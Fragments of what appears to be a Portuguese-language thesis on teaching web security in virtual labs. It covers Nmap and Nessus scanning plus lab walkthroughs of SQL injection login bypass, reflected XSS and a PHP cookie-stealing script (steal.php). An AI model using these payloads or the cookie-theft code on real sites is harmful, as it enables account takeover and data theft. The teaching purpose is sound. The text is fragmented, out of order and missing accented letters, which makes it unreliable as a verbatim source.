78. er til para ajudar a distribuir o tr fego de rede direcionado a uma sub rede espec fica durante varreduras extensas e Consider Unscanned Ports as Closed Se uma porta n o for examinada com um scanner de porta selecionado por exemplo fora do intervalo especificado ser considerada fechada pelo Nessus e Designate Hosts by their DNS Name Deve se usar o nome do host em vez do endere o IP na impress o do relat rio H tamb m op es de controle de como a varredura deve ser feita pelo Nessus de acordo com a rede a ser verificada e Reduce Parallel Connections on Congestion Permite que o Nessus detecte o envio de um grande n mero de pacotes e quando a conex o da 65 rede atingir a capacidade maxima o Nessus reduzira a velocidade da varredura ao n vel adequado para diminuir o congestionamento Ao diminuir o congestionamento o Nessus tentar reutilizar o espa o dispon vel na conex o da rede automaticamente e Use Kernel Congestion Detection Linux Only Permite que o Nessus monitore a CPU e outros mecanismos internos em caso de congestionamento e diminua o ritmo de maneira proporcional O Nessus tentar usar sempre o m ximo de recursos dispon veis Este recurso est dispon vel apenas para os scanners Nessus instalados em Linux Al m destas op es dispon veis para varredura no Nessus existem ainda outras op es dispon veis para o m todo de varredura a ser realizado intervalo de portas a serem varridas e
79. erabilidades Note que por padr o todos os plugins est o ativados Como queremos fazer uma varredura completa iremos deixar a maior parte deles ativados desativando apenas alguns que n o s o interessantes para a nossa rede virtual 97 10 Clique na bolinha verde das seguintes familias de plugins para desativa las por completo ela ficar cinza pois n o ser o teis em nossa politica personalizada para varrer a rede interna a qual conhecemos a b AIX Local Security Checks Verifica es para sistemas IBM AIX CentOS Local Security Checks Verifica es para sistemas CentOS Linux CGI abuses Verifica es para aplica es web incluindo testes de inje o SQL inclus o de arquivo local LFI inclus o de arquivo remoto RFI entre outros CGI abuses XSS Verifica es para aplica es web em cross site scripting XSS FreeBSD Local Security Checks Verifica es para sistemas FreeBSD HP UX Local Security Checks Verifica es para sistemas HP UX Junos Local Security Checks Verifica es para sistemas Juniper Junos MacOS X Local Security Checks Verifica es para sistemas Apple Mac OS X Solaris Local Security Checks Verifica es para sistemas Oracle Solaris 11 D uma olhada nas prefer ncias do submenu Preferences A lista de prefer ncias muda de acordo com os plugins instalados no Nessus N o ser preciso alterar nada em Preferences pois os valores preenchido
80. ere caractere de coment rio do MySQL ao final de cada campo para indicar ao MySQL que tudo o que vier depois desse caractere um coment rio e n o deve ser interpretado pelo banco de dados Assim se houve alguma outra verifica o que esteja nos atrapalhando ela ser ignorada pelo caractere de coment rio 11 Adicione o caractere sustenido deixando a linha de comando da seguinte forma username or 1 1 amp password or 1 1 sem os colchetes e em seguida clique em Replay Ainda nos falta alguma coisa para conseguir efetuar o login com sucesso Suponha que para o campo da senha o banco de dados esteja utilizando uma fun o de criptografia como por exemplo MD5 Desta forma precisando adicionar um par nteses para fechar a fun o no campo password 111 12 Agora finalmente substitua a linha para que fique da seguinte forma username or 1 1 amp password or 1 1 sem os colchetes e em seguida clique em Replay Finalmente conseguimos efetuar o login com sucesso sem digitar dados como usu rio e senha Voc p de perceber que o fato de n o conhecermos o banco de dados n o nos garante um procedimento simples e direto para efetuar uma inje o de c digo SQL preciso efetuar algumas tentativas prestar aten o s diferentes respostas e erros emitidos pelo banco de dados e em alguns casos utilizar algum conhecimento de SQL para supor algumas situa es e efetuar novas tenta
81. erform High speed vulnerability discovery to determine which hosts are running which services Agentless auditing to make sure no host on your network is missing security patches e Compliance checks to verify and prove that every host on your network adheres to the security policy you defined e Scan scheduling to automatically run scans at the frequency you select And more During the next steps we are going to create an administrative account and register your scanner with a Plugin Feed which we will download You will need an Activation Code before you can use Nessus if you do not have an Activation Code already please go to http www nessus org register to get one now Get started gt Figura 22 Interface Web Server do Nessus 6 Crie um login e uma senha para a conta de administrador no nosso caso login labtest senha labtest 7 Em seguida ser necess rio digitar o c digo de ativa o Para isso visite TENABLE A 2012 e selecione a op o Home Feed a qual gratuita e para uso dom stico como pode ser visto na figura 23 94 diste dicis as Obtain an Activation Code Nessus Auditor Using Nessus at Work Using Nessus at Home Bundles A ProfessionalFeed subscription A HomeFeed subscription is gt Nessus Plugins s real gt Documentation N outs of the h gt Nessus FAQ gt Deployment Options gt Training gt Nessus Evaluation SELECT Figura 23 Obten o
82. eta n o causando erros de registros em seu sistema Se um problema ocorre durante a compra devido a um ataque e o sistema n o registra a compra mas debita o valor do cart o de cr dito do comprador e um aviso de compra realizada com sucesso emitido para o usu rio isso certamente trar problemas e poss veis processos para a empresa Podemos citar ainda a seguran a computacional como uma pe a chave para manter segredos de n vel nacional segredos banc rios entre outros dados sigilosos que 21 est o presentes no nosso dia a dia como uma simples liga o telef nica a qual n o desejamos que outra pessoa possa interceptar e ouvir Assim a seguran a est diretamente ligada ao sucesso e garantia destas atividades que nos cercam diariamente Quando uma empresa passa a lucrar com uma venda pela Internet isso pode significar que outra empresa concorrente desta deixou de lucrar devido venda da primeira Essa situa o corriqueira com empresas que d o cobertura de vendas em mbito nacional e internacional O problema que quando uma empresa passa a ter o seu n mero de vendas online aumentado ela acaba ganhando visibilidade o que apesar de ser bom para as vendas por outro lado ruim para pessoas ou grupos mal intencionados que visam o fracasso das vendas de tal empresa seja por motivos de concorr ncia ou por motivos pessoais Desta forma quando uma empresa visar o crescimento de vendas na Internet important
83. etros embutidos na instru o SQL Par metros podem ser passados para estas requisi es em tempo de execu o Par metros contendo entradas do usu rio embutidas n o s o interpretados como comandos a serem executados n o havendo assim oportunidade para inje o de c digo Este m todo de embutir par metros na instru o SQL mais eficiente e muito mais seguro do que criar dinamicamente e executar instru es SQL utilizando t cnicas de jun o de Strings Manipula o Incorreta dos Caracteres de Escape Banco de dados SQL interpretam o caractere como o divisor entre c digo e dados Sendo assim toma se que tudo o que segue este caractere c digo a ser executado e tudo o que est encapsulado entre estes caracteres dado Desta forma este caractere utilizado em ataques de inje o SQL para escapar do contexto da requisi o do desenvolvedor para que o atacante possa construir suas pr prias requisi es e possa execut las Existem ainda outros caracteres de escape como por exemplo no Oracle o espa o em branco pipe duplo v rgula ponto e aspas duplas Manipula o Incorreta de Tipos Como visto no caso anterior dados e c digo s o separados por um caractere 9 entretanto nem todo dado de fato precisa estar entre aspas simples como o caso de n meros inteiros por exemplo Se colocarmos um inteiro entre aspas simples o dado ser tratado como String texto e n o como um n mero inteiro p
84. forem seguras Neste caso e em outros a seguran a computacional est diretamente relacionada com o sucesso e a garantia de funcionamento da aplica o A tecnologia est sempre inovando e trazendo novas solu es a problemas existentes o mesmo acontece com o mundo da seguran a computacional medida que novas tecnologias s o lan adas novas falhas aparecem e junto com elas os problemas pois estas falhas provavelmente ser o investigadas cedo ou tarde por pessoas oportunistas ou mesmo por pessoas intencionadas a investigar tais falhas e poder o se tornar criticas para a seguran a de um computador ou de uma rede Aliado ao aumento da tecnologia temos o aumento da conectividade entre computadores e dispositivos m veis que em certas ocasi es tamb m podem apresentar riscos a seguran a da rede caso boas pol ticas de seguran a n o estejam bem aplicadas As configura es da rede dos computadores e o estabelecimento de pol ticas de seguran a s o cruciais para manter o sistema seguro pois para efetuar um ataque basta que o atacante encontre apenas uma vulnerabilidade no sistema e atrav s da explora o desta falha dependendo da gravidade do problema ele poder tomar o controle de parte do sistema ou at do sistema por completo Por outro lado para que a pessoa respons vel pela seguran a destes computadores e redes possa proteg los necess rio eliminar 19 todas as possiveis vulnerabilidades do sistema pois uma Unic
85. forma prevista pelo programador da aplicac o DASWANI KERN KESAVAN 2007 p 124 Clarke 2009 p 13 completa Vulnerabilidades de injec o SQL devem ocorrer comumente quando o desenvolvedor de uma aplica o Web n o se certifica de que os valores recebidos dos formul rios da Web cookies par metros de entrada entre outros sejam validados antes de serem passados para requisi es SQL que ser o executadas no banco de dados do servidor Qualquer processo que construa uma instru o SQL pode estar potencialmente vulner vel A natureza diversa do SQL e os m todos dispon veis para constru lo 40 proporcionam op es variadas de codifica o A primeira forma de inje o SQL consiste na inje o direta de c digo nos par metros que s o concatenados com comandos SQL e executados Um ataque menos direto injeta c digo malicioso em Strings que est o destinadas ao armazenamento em uma tabela ou em Strings que servir o de metadados Quando as Strings armazenadas s o subsequentemente concatenadas com um comando SQL din mico o c digo malicioso executado Quando uma aplica o Web falha em filtrar adequadamente os par metros que s o passados para instru es SQL dinamicamente criadas mesmo utilizando t cnicas de parametriza o poss vel a um atacante alterar a constru o de instru es SQL Quando um atacante capaz de modificar uma instru o SQL a instru o ir ser executada com os mesmos privil gios
86. gosos como a experimenta o de infec es por v rus Assim as m quinas virtuais apresentam a vantagem de isolamento n o colocando em risco a m quina hospedeira sua rede nem outros usu rios da Internet NANCE HAY DODGE SEAZZU BURD 2009 p 5 Uma outra vantagem de se usar virtualiza o no ensino de seguran a que no decorrer da aula pode ser interessante o uso de diferentes sistemas operacionais para a realiza o dos testes Desta forma a virtualiza o do ambiente a ser utilizado facilta ao aluno ter em uma nica m quina hospedeira diferentes sistemas 71 operacionais em funcionamento sem a necessidade de ficar reiniciando o computador para realizar tais testes Al m disso a realiza o dos testes em m quinas virtuais permite que a m quina hospedeira mantenha se livre das influ ncias ocasionadas pelos testes Para Belapurkar Chakrabarti Ponnapalli e Varadarajan 2009 p 297 a virtualiza o tenha talvez o seu maior papel na seguran a de desktops Enquanto a tecnologia de virtualiza o est avan ando rapidamente atrav s da inova o de hardware e software no mercado boa parte dela est focada em servidores A medida que a tecnologia de virtualiza o se torna amig vel para desktops h muito o que se ganhar em termos de seguran a dos desktops Potencialmente poderiam existir dom nios separados para rodarem aplica es seguras e n o seguras evitando v rios problemas de seguran a e privacidad
87. guran a n o sejam tomadas O fato de termos cada vez mais redes de computadores dispon veis ao nosso alcance pode significar um aumento no risco seguran a pois se estas redes estiverem ligadas rede mundial de computadores por exemplo torna se mais dif cil controlar a seguran a da rede e preveni la de ataques externos De qualquer forma a tecnologia converge cada vez mais para a conectividade sendo necess rio portanto tornar os computadores e as redes cada vez mais seguras Aplica es web no estilo e commerce por sua vez dependem massivamente da seguran a computacional pois sem ela estas aplica es n o fariam sentido Ao efetuar uma compra pela Internet um usu rio espera que seus dados pessoais e banc rios sejam mantidos em sigilo da mesma forma que a empresa que est vendendo o produto espera que a transa o seja efetivada com sucesso e os valores corretos sejam contabilizados Al m disso existem outras preocupa es em uma transa o como esta como por exemplo identificar se o usu rio que est 18 efetuando a compra efetivamente o usuario esperado e nao outro usuario tentando se passar pelo usu rio leg timo entregando informa es falsas Necessidades como estas mostram que apesar de o mercado ter uma demanda muito grande por aplica es online de transa es no estilo e commerce de nada adianta um aumento significativo destas aplica es e da complexidade destas aplica es se as mesmas n o
88. ica 1 Rede virtual 1 O primeiro passo clicar em Add na aba Policies 96 Em seguida no submenu General vamos preencher na rea Basic o nome da nossa pol tica no campo Name com Rede virtual Na rea Scan vamos desmarcar a op o Safe Checks pois esta op o far com que o Nessus n o utilize plugins que possam causar instabilidade no alvo remoto Como n s vamos varrer a nossa pr pria rede virtual e esta uma rede criada para testes n o h problemas caso isso aconte a Na rea Network Congestion iremos deixar ambas op es desmarcadas como est o pois n o preciso nos preocuparmos com o congestionamento em nossa rede virtual Na rea Port Scanners tamb m n o iremos mexer Aqui o Nessus ir utilizar o Nmap instalado em nossa m quina virtual para efetuar a varredura a procura de portas Na rea Port Scan Options iremos alterar o campo Port Scan Range para al Esta pol tica ter o objetivo de varrer a nossa rede virtual e como sabemos que a nossa rede n o muito grande devido s nossas limita es de executar muitas m quinas virtuais ao mesmo tempo podemos fazer a varredura em todas as portas dos hosts Na rea Performance deixaremos as configura es padr es N o iremos utilizar credenciais portanto passemos para o submenu Plugins para escolhermos quais plugins o Nessus ir utilizar para detectar poss veis vuln
89. idade do risco 4 Para se obter mais informa es sobre estas vulnerabilidades basta dar um duplo clique em cima do host desejado Com duplos cliques em cima das novas informa es mostradas poss vel se obter mais informa es como pode ser visto na figura 27 user About Log out Scans Policies Varredura de Rede Virtual 1 Vulnerability Summary Host Summary Download Report Completed Apr 1 2012 8 40 Audit Trail Filters Filters Add Filter e Clear Filters 7 rr rn n V 7 5 11213 Medium HTTP TRACE TRACK Methods Allowed 192 168 6 2 0 tcp 7 Medium Apache 2 2 lt 2 2 22 Multiple Vulnerabilities 192 168 6 1 14 0 Medium Apache HTTP Server httpOnly Cookie Information Disclosure 192 168 6 133 E 0 1 Info HTTP Server Type and Version 192 168 6 254 i 123 udp Info Nessus SYN scanner 135 tcp Info Service Detection 56496 tcp Info HyperText Transfer Protocol HTTP Information Info HTTP Methods Allowed per directory Figura 27 Explorando relat rios no Nessus Na imagem seguinte mostrado o relat rio da varredura Varredura de Rede Externa 1 Varredura de Rede Externa 1 Completed Apr 1 2012 8 58 Vulnerability Summary Host Summary Filters Filters Add Filter Figura 28 Detalhamento de relat rios no Nessus Na figura 28 podemos ver as informa es 102 Download Report Remove Vulnerability Audit Trail Clear Filters P
90. idades reportadas ao ano tem aumentado de 2006 a 2010 segundo dados da Symantec 2011 como podemos ver na figura 4 o que demonstra que devemos constantemente nos preocupar em identificar e corrigir vulnerabilidades em nossos sistemas a fim de reduzir ao m ximo os riscos aos quais estamos expostos 2 2 3 Ataques Um ataque uma a o que pode causar uma viola o de seguran a BISHOP 2004 p 4 Enquanto uma amea a representa apenas um risco da ocorr ncia de uma a o de viola o de seguran a um ataque a concretiza o desta a o O indiv duo ou grupo de indiv duos que executam um ataque ou fazem com que um ataque aconte a s o chamados de atacantes Segundo a refer ncia OWASP A 2011 Ataques s o as t cnicas que os atacantes usam para explorar as vulnerabilidades em aplica es 28 Da mesma forma como a natureza das ameacas pode variar as categorias dos ataques tamb m sao flexiveis Ao longo do tempo a natureza dos ataques apresenta varia es sendo que alguns deles mant m se no cen rio atual outros foram extintos e alguns novos passaram a existir RICHARDSON 2009 p 6 A tabela 2 mostra o cen rio dos 10 problemas mais cr ticos em seguran a que atingem as aplica es web De forma not vel os problemas de inje o como SQL Injection e Cross Site Scription XSS mant m se no topo da tabela OWASP Top 10 2007 Previous OWASP Top 10 2010 New A2 Injection Flaws A1 Injectio
91. ine ACKER BACKER 2007 p 3 Partindo deste ponto surge a necessidade da cria o de novos mecanismos de autentica o os quais ser o vistos no cap tulo 2 5 2 2 3 5 N o Repudia o A propriedade de n o repudia o deve garantir que um terceiro qualquer possa ter certeza de que uma transa o particular ou evento aconteceu ou n o aconteceu LANDWEHR 2001 p 6 N o h utilidade nenhuma em atribuir um valor legal a uma transa o se facilmente o autor da transa o poder neg la posteriormente Por isso garantir a propriedade de n o repudia o garantir que o autor da transa o n o possa neg la futuramente associando definitivamente a autoria da transa o com o seu leg timo autor ACKER BACKER 2007 p 2 33 2 4 Pol ticas de Seguran a Pol ticas de seguran a para computa o s o como leis para a sociedade S o regras que regem o que pode e o que n o pode ser feito De acordo com a defini o 1 1 cap tulo 1 de Bishop 2004 p 7 Uma pol tica de seguran a uma senten a do que e do que n o permitido As pol ticas de seguran a s o utilizadas para atingir um determinado objetivo e s o a base do planejamento de seguran a de um sistema rede ou de uma organiza o como um todo por isso devem ser cuidadosamente pensadas e planejadas afim de que sejam bem definidas para o fim espec fico Pol ticas de seguran a mal planejadas ou mal especificadas podem causar s
92. ine E Consulting Corp 2010 20 De acordo com a Figura 1 o volume de vendas online em R saltou de 4 3 bilh es em 2002 para 24 9 bilh es em 2010 o que j representa aproximadamente 4 1 do varejo brasileiro Ainda podemos visualizar na Figura 1 que o crescimento das vendas online constante no per odo analisado e bastante significativo Al m de servi os de com rcio eletr nico outros servi os online que necessitam de seguran a computacional tamb m vem aumentando como o caso do E government que se caracteriza pelo relacionamento de cidad os e o governo de forma virtual Para que uma empresa que vende um servi o ou produto online tenha sucesso em sua venda preciso que algumas propriedades de seguran a sejam garantidas e tanto o cliente quanto a empresa tenham os seus objetivos atingidos sem efeitos colaterais Em um caso espec fico para exemplificar podemos citar um cliente que utiliza o seu cart o de cr dito para comprar um produto online No ato da compra o cliente ir se identificar digitalmente e ir digitar os n meros de seu cart o de cr dito Tanto a identidade do cliente quanto seus dados banc rios devem ser processados de forma sigilosa a fim de n o serem revelados para outras pessoas e garantir a seguran a do comprador J para a empresa que vende o produto ou servi o al m de ser respons vel pela seguran a do cliente que efetua a compra precisa assegurar se de que processar a venda de forma corr
93. ioso normalmente fica no pr prio link que o usu rio clica podendo estar em alguns casos em formul rios tamb m O cen rio requerido para realizarmos um ataque XSS refletido quando a p gina resultante de uma 124 requisi o devolve parcialmente ou totalmente a entrada que utilizamos na requisi o Como em uma busca por exemplo Nesta tarefa vamos apenas fazer uma demonstra o de como um ataque XSS refletido funciona Para isso vamos criar no diret rio C Arquivos de programas Apache Software Foundation Apache2 2 htdocs uma pagina HTML chamada teste php que cria um link com o endere o passado como par metro no navegador como mostra a figura 46 lt html gt lt head gt lt title gt Teste de XSS refletido lt fitle gt lt head gt lt body gt a href lt php echo _GETT linklocation gt gt Link lt a gt lt body gt lt html gt Figura 46 C digo do arquivo teste php Agora vamos acessar a pagina pelo navegador Mantra passando como parametro a pagina index padr o do Apache index html 1 Acesse a p gina criada do navegador Mantra troque o endere o IP do link pelo endere o IP de sua m quina virtual Windows http 192 168 6 131 test php linklocation index html 2 Clique no link da p gina e veja o resultado Agora vamos inserir um simples c digo JavaScript no par metro passado ao navegador para testar um ataque XSS refletido 3 Altere endere o acessado para substitua
94. ivate Browsing Bookmarks F History Downloads Find Save Page As el Send Link E Print zz Web Developer FireSSH Full Screen HttpFox Set Up Sync X Exit EireFTP US Us x Firebug 1 n ac CTF 6 7 W id Web Console SQLite Manager Home Log In E DOM Inspector 1 Scratchpad 3 View Page Source Modify Headers About Us Error Console 3 Are you looking to Cookies Manager Widgets Inc is the More Tools and most respected e in widgets we re h Selenium IDE jn login gt 106 gt O information Ed Miscellaneous Pp Outline Resizer x Other k trl Shift dedicated staff of professionals can provide Figura 31 Como abrir o Firebug no MANTRA Open Firebug Firebug UI Location Deactivate Firebug for This Site Open With Editor Text Size Options Firebug Online Inspect Element Profile JavaScript Command Line Search Customize Shortcuts About 1 9 0b5 shift F Shift C Shift l 6 Em seguida clique no bot o de inspe o de elemento na janela N wow ow da ferramenta Firebug que aparece na parte de baixo da tela contorno em vermelho e depois clique no formul rio da p gina de inspecionarmos o c digo como na figura 32 login para 107 About Us Log In About 1 Are you looking to buy or sell widgets Authenlicate This websit Widgets Inc is the internet s
95. l vantagem de se usar a varredura de ping UDP que ela passar por firewalls e filtros que bloqueiam apenas os pacotes TCP Existem ainda outras t cnicas para a descoberta de hosts na rede utilizando o NMAP que n o ser o abordadas aqui mas que podem ser acessadas diretamente em NMAP A 2012 57 T cnicas de Varredura de Portas Para cada caso de uso do NMAP podemos escolher dentre algumas t cnicas de varredura que melhor atendem as necessidades da varredura Em alguns casos por exemplo desejamos varrer uma rede inteira sem sermos notados em outros casos a varredura esta sendo feita pelo pr prio administrador da rede para auditoria de seguran a e esse detalhe n o importante mas outras caracter sticas na varredura s o desejadas Para isso temos algumas t cnicas de varredura de portas sS scan TCP SYN A varredura SYN a op o de varredura padr o mais popularmente utilizada pois pode ser executada rapidamente varrendo milhares de portas por segundo em uma rede r pida n o bloqueada por firewalls intrusivos A varredura SYN camuflada uma vez que ela nunca completa uma conex o TCP Esse tipo de varredura permite uma diferencia o clara e confi vel entre os estados aberto open fechado closed e filtrado filtered ST scan TCP connect A varredura TCP connect a varredura padr o do TCP quando a varredura SYN n o uma op o uma op o para quando o usu rio n o tem privil gios para cri
96. l De Authentication and Non repudiation with existing electronic identity cards IBM Belgica 2007 BELAPURKAR Abhijit CHAKRABARTI Anirban PONNAPALLI Harigopal VARADARAJAN Niranjan Distributed Systems Security Issues Processes and Solutions Publica o John Wiley amp Sons Ltd 2009 ISBN 978 0 470 51988 2 BISHOP Matt Introduction to Computer Security Edi o Addison Wesley Professional 2005 ISBN 0 321 24744 2 BRINHOSA Rafael WESTPHALL Carla Merkle WESTPHALL Carlos Becker Desenvolvimento do Modelo WSIVM para Aperfei oar a Seguran a em SOA e Servi os Web SEMISH SBC Julho de 2011 Natal RN CERT Centro de Estudos Resposta e Tratamento de Incidentes de Seguran a no Brasil Dispon vel em lt http www cert br stats incidentes gt Acessado em 30 de Junho de 2011 CGI Security The Cross Site Scripting XSS FAQ Dispon vel em lt http www cgisecurity com xss faq html gt Acessado em 16 de Janeiro de 2012 129 CHEN Li Chiou TAO Lixin Teaching Web Security Using Portable Virtual Labs 11th IEEE International Conference on Advanced Learning Technologies Pace University Pleasantville New York 2011 pp 491 495 6 8 July 2011 DOI 10 1109 ICALT 2011 153 CLARKE Justin SQL Injection Attacks and Defense Publicado por Syngress Publishing Inc Elsevier Inc 30 Corporate Drive Burlington MA 01803 2009 ISBN 13 978 1 59749 424 3 DASWANI Neil KERN Christoph
97. lando sua exist ncia no processo A raz o pela qual o NMAP oferece varreduras utilizando pacotes SYN e ACK a maximiza o das chances de driblar firewalls pois alguns firewalls est o configurados por exemplo para rejeitar pacotes do tipo SYN entrantes exceto aqueles destinados a servi os p blicos como o site web da empresa ou servidor de correio eletr nico e nestas condi es pacotes do tipo ACK teriam sucesso PU listadeportas ping usando UDP Nesta op o o NMAP envia um pacote UDP vazio ou de um tamanho especificado data length para as portas informadas Caso nenhuma porta seja especificada no par mentro listadeportas a porta padr o 31338 escolhida Uma porta alta incomum utilizada propositalmente como padr o porque enviar para portas abertas normalmente indesejado para este tipo particular de varredura Se o pacote chegar a uma porta fechada na m quina alvo a sondagem UDP deve causar um pacote ICMP de porta inalcan vel como resposta e isso diz ao NMAP que a m quina est ativa e dispon vel Muitos outros tipos de erros ICMP tais como host rede inalcan vel ou TTL Time to Live excedido s o indicativos de um host inativo ou inalcan vel A falta de resposta tamb m interpretada dessa forma Se uma porta aberta alcan ada a maioria dos servi os simplesmente ignoram o pacote vazio e falham ao retornar qualquer resposta por isso uma porta pouco prov vel de estar em uso escolhida A principa
98. log txt deve ser deixado em branco pois iremos utiliz lo para armazenar os cookies roubados O arquivo steal php ser o nosso script de roubo de cookies e deve conter a seguinte sequ ncia de comandos como mostra a figura 42 lt php cookie GET cookie date date 1 ds of F Y h i s user agent SERVER HTTP USER AGENT 1 file fopen log txt fwrite file DATE date USER AGENT user agent COOKIE cookie n fclose C file5 echo b Desculpe ocorreu um errolz b br br 7 meta http equiv Refresh content 0 urlzhttp 192 168 6 135 Figura 42 C digo do arquivo steal php Este c digo escrito em PHP basicamente abre o arquivo log txt localizado no mesmo diret rio e escreve algumas vari veis como a data em que o usu rio teve seu cookie roubado o navegador utilizado pelo usu rio e o cookie que foi roubado Em seguida o script fecha o arquivo log txt e emite uma mensagem de erro apenas para dar ao usuario a impressao de que a p gina acessada nao pode ser visualizada como sucesso No final do arquivo um comando de redirecionamento 121 automaticamente leva o usu rio a p gina inicial Lembre se de alterar o endere o http 192 168 6 135 para o endere o alocado em seu computador para a m quina virtual CTF6 Agora vamos fazer o post do link malicioso para que as v timas possam clicar 2 Fa a login no site clicando em Log In e entrando com os da
99. lugin ID 17710 Port Service www 80 tcp Severity High x Plugin Name PHP lt 4 4 4 Multiple Vulnerabilities Synopsis The remote web server uses a version of PHP that is affected by multiple vulnerabilities Description According to its banner the version of PHP installed on the remote host is older than 4 4 4 As such it is potentially affected by the following vulnerabilities The c client library 2000 2001 or 2004 for PHP does not check the safe_mode or open_basedir functions CVE 2006 1017 A buffer overflow exists in the sscanf function CVE 2006 4020 Solution Upgrade to PHP version 4 4 4 or later See Also https bugs php net bug php id 38322 htt php net releases 4 4 4 phi Risk Factor High CVSS Base Score 9 3 CVSS2 AV N AC M Au N C C l C A C CVSS Temperal Score 7 3 CVSS2 E POC RL OF RC ND Plugin Output Version source Server Apache 2 0 59 FreeBSD DAV 2 4 4 2 mod ssl 2 0 59 OpenSSL 0 9 8b Installed version 4 4 2 Fixed version 4 4 4 CPE cpe la php php detalhadas de uma das vulnerabilidades encontradas no alvo www inf ufsc br Dentre estas informa es podemos ver a sinopse e a descri o da vulnerabilidade encontrada e em seguida a solu o apresentada pelo Nessus para resolver o problema H ainda refer ncias de links externos relacionados com a vulnerabilidade encontrada Se voc preferir poss vel ainda gerar um documento HTML conten
100. m ataque a nica forma 74 confi vel de testar um n vel de seguran a de um ambiente e como este ambiente ira reagir quando estiver sendo atacado por um ataque real HARRIS HARPER EAGLE NESS LESTER 2005 p 15 5 5 constru o do ambiente virtual Para que os testes realizados em nossos ambientes virtuais tenham uma maior abrang ncia dos diferentes tipos de problemas encontrados e em diferentes tipos de sistemas operacionais utilizaremos m quinas virtuais com o sistema operacional Linux Ubuntu e tamb m m quinas virtuais com o sistema operacional Windows XP Para criar um ambiente controlado importante come ar a sua cria o do zero pois ambientes prontos podem conter configura es indesejadas e ou at problemas pr existentes n o resolvidos que podem influenciar e atrapalhar os testes a serem realizados Gregg 2008 p 16 ressalta Problemas antigos ser o herdados devido aos erros ou equ vocos de usu rios anteriores E mesmo que voc instale e configure corretamente as ferramentas a partir de uma instala o existente voc nunca poder ter plena certeza de como exatamente tudo foi configurado No nosso caso a instala o dos sistemas operacionais nas m quinas virtuais foram realizadas do zero para garantir a n o exist ncia de alguma configura o realizada anteriormente A escolha do sistema operacional Windows XP para uma das m quinas virtuais justifica se por ser um dos sistemas Wind
101. n 1 Cross Site Scripting XSS 2 Cross Site Scripting 55 A7 Broken Authentication and Session Management Broken Authentication and Session Management A4 Insecure Direct Object Reference A4 Insecure Direct Object References A5 Cross Site Request Forgery CSRF A5 Cross Site Request Forgery CSRF was T10 2004 A10 Insecure Configuration Management Security Misconfiguration NEW A8 Insecure Cryptographic Storage A7 Insecure Cryptographic Storage A10 Failure to Restrict URL Access 8 Failure to Restrict URL Access A9 Insecure Communications A9 Insufficient Transport Layer Protection not in T10 2007 A10 Unvalidated Redirects and Forwards NEW Malicious File Execution dropped from T10 2010 Information Leakage and Improper Error Handling dropped from T10 2010 Tabela 2 Tabela dos 10 problemas mais cr ticos de seguran a em aplica es web OWASP C 2011 2 3 Propriedades de seguranca A seguran a computacional ap ia se em 3 pilares segundo Bishop 2004 p 1 Confidencialidade integridade e disponibilidade Na vis o de Landwehr 2001 p 6 por muitos anos apenas as 3 propriedades citadas por Bishop formavam a base da seguran a computacional mas para ele 2 novas propriedades passaram a integrar este conjunto autenticidade e nao repudia o 29 2 3 1 Confidencialidade A propriedade de confidencialidade deve
102. n o ser o realizadas verifica es de seguran a relacionadas a logins an nimos Relat rios completos Al m de detectar as vulnerabilidades de seguran a existentes na rede e o n vel de risco de cada uma delas baixo m dio alto e grave o Nessus oferece solu es de como atenua las 62 Suporte total a SSL O Nessus capaz de testar os servi os oferecidos por SSL como HTTPS SMTPS IMAPS entre outros Testes n o destrutivos opcional O Nessus permite ativar uma op o chamada safe checks para que desta forma verifica es que possam causar danos ou interrup es na rede sejam executadas atrav s do uso de banners de servidor ao inv s de explorar a falha Pol ticas de Seguran a no Nessus Juntamente com o Nessus vir o predefinidas algumas pol ticas criadas pela Tenable Network Security Inc Essas pol ticas s o fornecidas como modelos para ajudar na cria o de pol ticas mais espec ficas ou para serem usadas sem modifica es para varreduras b sicas dos seus recursos e Varredura de rede externa Esta pol tica foi projetada para a verifica o de hosts externos e que normalmente apresentam menos servi os rede Os plugins relacionados a vulnerabilidades conhecidas de aplicativos da Web as fam lias de plugins CGI Abuses e CGI Abuses XSS s o ativados com a aplica o desta pol tica Al m disso todas as 65 535 portas s o verificadas em cada alvo e Varredura de rede interna Esta pol tica
103. ndo os campos da seguinte forma a Name Varredura de Rede Externa 1 b Type Run Now c Policy Rede Externa d Scan Targets www inf ufsc br Tarefa 3 Analisar os relatorios 100 Agora que ja realizamos as varreduras vamos analisar os resultados 1 Para acessar a tela de relat rios clique no menu superior Reports 2 De um duplo clique no nome do relat rio para analis lo Vamos come ar analisando o relat rio Varredura de Rede Virtual 1 Reports Scans Policies Varredura de Rede Virtual 1 Vulnerability Summary Host Summary Completed Apr 1 2012 8 40 Filters Filters Add Filter 5 SERIES EN E DNS Server Cache Snooping Remote Information Disclosure Apache 2 2 lt 2 2 22 Multiple Vulnerabilities Apache HTTP Server httpOnly Cookie Information Disclosure IP Forwarding Enabled Nessus SYN scanner Nessus Scan Information VMware Virtual Machine Detection Ethemet Card Manufacturer Detection OS Identification Service Detection Common Platform Enumeration CPE Device Type HTTP Server Type and Version Traceroute Information VMware ESX GSX Server detection HyperText Transfer Protocol HTTP Information TCP IP Timestamps Supported HTTP Methods Allowed per directory ICMP Timestamp Request Remote Date Disclosure Network Time Protocol NTP Server Detection DNS Server Detection Host Fully Qualified Domain Name FQDN Resolution Authenticated Check OS Name and Installed Pa
104. ni o est tica pois a constante atualiza o dos plugins utilizados pelo Nessus pode nos oferecer diferentes op es de configura es de acordo com novos plugins adicionados O fato de as varreduras do Nessus darem cobertura a muitas vulnerabilidades faz com que a lista de op es de configura es seja um pouco extensa de modo que vamos desconsiderar muitas delas e deixar a configura o padr o como indica o pr prio manual da ferramenta Antes de criarmos novas pol ticas note que o Nessus j traz algumas pol ticas definidas Confira clicando na aba Policies que aparece na parte superior da interface como mostra a figura 24 Nessus labtest About Log out Policies Import Policy Add Export E Copy Delete Name Visibility Owner External Network Scan Shared Tenable Policy Distribution Service Prepare for PCI DSS audits section 11 2 2 Shared Tenable Policy Distribution Service Web App Tests Shared Tenable Policy Distribution Service Internal Network Scan Shared Tenable Policy Distribution Service Figura 24 Politicas pr definidas do Nessus Voc pode analisar detalhadamente as configura es de cada pol tica definida pelo Nessus se fizer login como administrador e clicar em Edit ap s selecionar uma das pol ticas Agora vamos criar nossas pr prias pol ticas para varrer as redes Para as configura es que n o forem citadas deixe as como est o por padr o Pol t
